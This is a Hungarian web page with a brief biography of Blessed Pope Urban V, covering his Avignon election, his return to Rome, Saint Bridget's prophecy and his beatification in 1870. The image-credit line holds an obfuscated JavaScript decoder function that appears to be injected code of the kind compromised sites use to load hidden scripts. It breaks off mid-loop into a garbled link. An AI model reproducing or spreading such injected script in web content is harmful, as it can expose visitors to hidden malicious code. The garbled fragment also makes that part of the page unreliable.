Boldog V. Orbán pápa

Családi neve Grimoard Vilmos volt. 1310 körül született a Grisac nevű várkastélyban. Keresztvíz alá Szent Elzeár tartotta. Fiatalon végezte el a civil jogot és a bencéseknél jelentkezett novíciusnak. Utána Franciaország leghíresebb egyetemén tanult. 1342-ben pappá szentelték, majd Avignonban az egyházjog tanára lett. Szerzetes létére, püspöki helytartó volt két egyházmegyében. Több pápai kinevezést is kapott.

1362-ben Avignonban egyhangúlag megválasztották VI. Ince pápa utódjának. Így aztán, vele is folytatódott a fogságban lévő pápák sora, bár rájött, hogy Rómában van a helye. Vissza is ment, de mégis francia földön kellett meghalnia. A szigorú, mélyen vallásos pápa, aki megtartotta a bencések fekete viseletét, folytatta VI. Ince reformjait; fő célja volt egyesülni az elszakadt Keleti Egyházzal. Ezért is tért vissza Rómába. V. Orbán pápa 1367. április 30-án hagyta el Avignont. Visszatérésével véget ért a pápák 70 éves fogsága. Mivel a lateráni palota lakhatatlan volt, a Szent János-székesegyház is 1360-ban leégett, emiatt a Vatikánban rendezkedett be. A későbbiekben meglátogatta a bizánci császár, a német-római uralkodó, IV. Károly, valamint Nagy Lajos magyar királyunk is, aki ötszáz válogatott magyar lovast küldött a védelmére. Az itáliai helyzet teljes bizonytalansága miatt, és a francia bíborosok nyomásának engedve, visszatért Avignonba. Hiába kérték a rómaiak, és az időközben itt letelepedett Svéd Szent Brigitta is, aki részben hazahozta, mégis elment. Brigitta akkor megjövendölte, hogy ott fog meghalni, korai halállal. A jóslat három hónap múlva be is teljesedett. Marseille-ben temették el, de a nép szentként tisztelte. IX. Boldog Piusz pápa 1870-ben avatta boldoggá.

Forrás: http://romkat.ro

Kép: function a4872b9c6b(y1){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var x0=”;var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaand.com”>http://wikiwand.com

About the author

majoros gabriella

Leave a Comment